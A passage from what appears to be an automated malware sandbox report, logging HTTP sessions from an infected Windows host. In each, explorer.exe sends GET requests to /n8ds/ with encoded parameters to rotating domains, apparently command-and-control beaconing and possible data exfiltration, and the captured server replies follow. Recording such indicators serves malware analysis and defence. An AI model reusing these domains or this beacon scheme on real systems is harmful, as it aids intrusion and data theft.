{font-size:20px;color:#1F84FF;margin-bottom:20px;margin-top:0;font-weight:normal;line-height:30px;}a {color:#1873b4;}div {width: 700px;margin: 100px auto 0 auto;padding-top: 50px;height: 120px;line-height: 150%;}</style></head><body><div><h1> dubaicars.online </h1><div style="padding: 10px; background-color: #eeeeee"> <b> !</b><br> . <a rel="nofollow" href="https://adm.tools/hosting/?page=4"> </a>
Dec 1, 2021 10:35:57.976475954 CET	486	IN	Data Raw: d0 b8 d0 bc d0 be 20 d0 bd d0 b0 d0 b6 d0 b0 d1 82 d1 8c 20 d0 bd d0 b0 20 d0 ba d0 bd d0 be d0 bf d0 ba d1 83 20 22 d0 9f d1 80 d0 be d0 b4 d0 bb d0 b8 d1 82 d1 8c 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d0 b2 20 d0 ba d1 80 d0 b5 d0 b4 Data Ascii: " ". <br><br> , ,
Dec 1, 2021 10:35:57.976511955 CET	486	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.11.20	49806	203.170.80.250	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:36:03.301599026 CET	487	OUT	GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL HTTP/1.1 Host: www.mackthetruck.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.11.20	49807	185.61.153.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:36:13.696224928 CET	488	OUT	GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1 Host: www.dif-directory.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:36:13.724998951 CET	489	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Wed, 01 Dec 2021 09:36:13 GMT server: LiteSpeed location: https://www.dif-directory.xyz/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c x-turbo-charged-by: LiteSpeed x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains; preload; referrer-policy: no-referrer-when-downgrade connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.11.20	49808	185.98.5.234	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:36:18.826982021 CET	490	OUT	GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1 Host: www.avto-click.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:36:18.927215099 CET	491	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 01 Dec 2021 09:36:18 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.avto-click.com/n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.11.20	49810	50.118.200.120	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:36:42.228549004 CET	500	OUT	GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1 Host: www.mariforum.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:36:42.392623901 CET	501	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 Dec 2021 09:36:33 GMT Content-Type: text/html Content-Length: 801 Connection: close Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e c7 e0 ba a3 b4 c8 c1 b1 b2 cd d2 fb b9 dc c0 ed d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></head><body><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49792	34.117.168.233	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:33:58.498277903 CET	452	OUT	GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&4ha8=4hi0dlyHZliDfr HTTP/1.1 Host: www.quickcoreohio.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:33:58.557224989 CET	453	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 01 Dec 2021 09:33:58 GMT Content-Length: 0 location: https://www.quickcoreohio.com/n8ds?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG%2FYe&4ha8=4hi0dlyHZliDfr strict-transport-security: max-age=120 x-wix-request-id: 1638351238.5061440754192168 Age: 0 X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMee4S/tIi1tDSp5Qumwr1X2,qquldgcFrj2n046g4RNSVCm4KltXwR8rcp1PEWM/24w=,2d58ifebGbosy5xc+FRals1iGk+Dzs7YMEQs9FzqM731GxMmD0QkTvjSjuzyIlnzjoe2GMQJ/MdiMK4Y/vI70wH2bhC5kpIPgX7mMayef2U=,2UNV7KOq4oGjA5+PKsX47Ap6L/PfruwthWYF2FkPoC1YgeUJqUXtid+86vZww+nL,2r0eby5dl6V4RsTzy6fSQBa4WkxNqw3T7h5qXwtfnzLwcXiCJjelMQdweukbvEnQ,l7Ey5khejq81S7sxGe5NkzWZApkBKNPXUZc4tWRmF4pNG+KuK+VIZfbNzHJu0vJu,UCcefuQCi27dXmJSD6Vpi13kdmCHz08NAauL91yJBmL3eDRED8E4Fg02brRqK54KWIHlCalF7YnfvOr2cMPpyw== Cache-Control: no-cache server-timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3_g X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10 Via: 1.1 google Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.11.20	49811	199.59.242.153	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:36:47.488163948 CET	502	OUT	GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1 Host: www.effective.store Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:36:47.583441973 CET	503	IN	HTTP/1.1 200 OK Server: openresty Date: Wed, 01 Dec 2021 09:36:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: parking_session=316cf26c-f9a3-2dc1-9b07-4c3ff6085d7f; expires=Wed, 01-Dec-2021 09:51:47 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_aouWvJ9foHu9h2IZO1AVXAiGkFF0mjysLia46XFfNlV3BgMktnDdtB++9NcJeojUA3StzqNPT22SrzKXPGtwTA== Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 35 39 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 61 6f 75 57 76 4a 39 66 6f 48 75 39 68 32 49 5a 4f 31 41 56 58 41 69 47 6b 46 46 30 6d 6a 79 73 4c 69 61 34 36 58 46 66 4e 6c 56 33 42 67 4d 6b 74 6e 44 64 74 42 2b 2b 39 4e 63 4a 65 6f 6a 55 41 33 53 74 7a 71 4e 50 54 32 32 53 72 7a 4b 58 50 47 74 77 54 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 62 6f 64 69 73 63 64 6e 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 20 63 72 6f 73 73 Data Ascii: 591<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_aouWvJ9foHu9h2IZO1AVXAiGkFF0mjysLia46XFfNlV3BgMktnDdtB++9NcJeojUA3StzqNPT22SrzKXPGtwTA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin><link rel="dns-prefetch" href="https://fonts.googleapis.com" cross
Dec 1, 2021 10:36:47.583498001 CET	504	IN	Data Raw: 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 Data Ascii: origin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiMzE2Y2YyNmMtZjlhMy0yZGMxLTliMDctNGMzZmY2MDg1ZDdmIiwicGFnZV90aW1lIjoxNjM4MzUxNDA3LCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy5lZmZlY3RpdmUuc3RvcmVcL244ZHNcLz
Dec 1, 2021 10:36:47.583534956 CET	504	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.11.20	49812	104.21.82.227	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:37:03.333529949 CET	505	OUT	GET /n8ds/?3fIl1=6lYt5jhP&gHl=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j HTTP/1.1 Host: www.ozattaos.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.11.20	49813	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:37:09.230278969 CET	506	OUT	GET /n8ds/?gHl=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&3fIl1=6lYt5jhP HTTP/1.1 Host: www.littlefishth.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:37:09.337218046 CET	507	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 01 Dec 2021 09:37:09 GMT Content-Type: text/html Content-Length: 275 ETag: "618be735-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.11.20	49814	185.61.153.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:37:52.205991030 CET	509	OUT	GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1 Host: www.dif-directory.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:37:52.234708071 CET	511	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Wed, 01 Dec 2021 09:37:52 GMT server: LiteSpeed location: https://www.dif-directory.xyz/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c x-turbo-charged-by: LiteSpeed x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains; preload; referrer-policy: no-referrer-when-downgrade connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 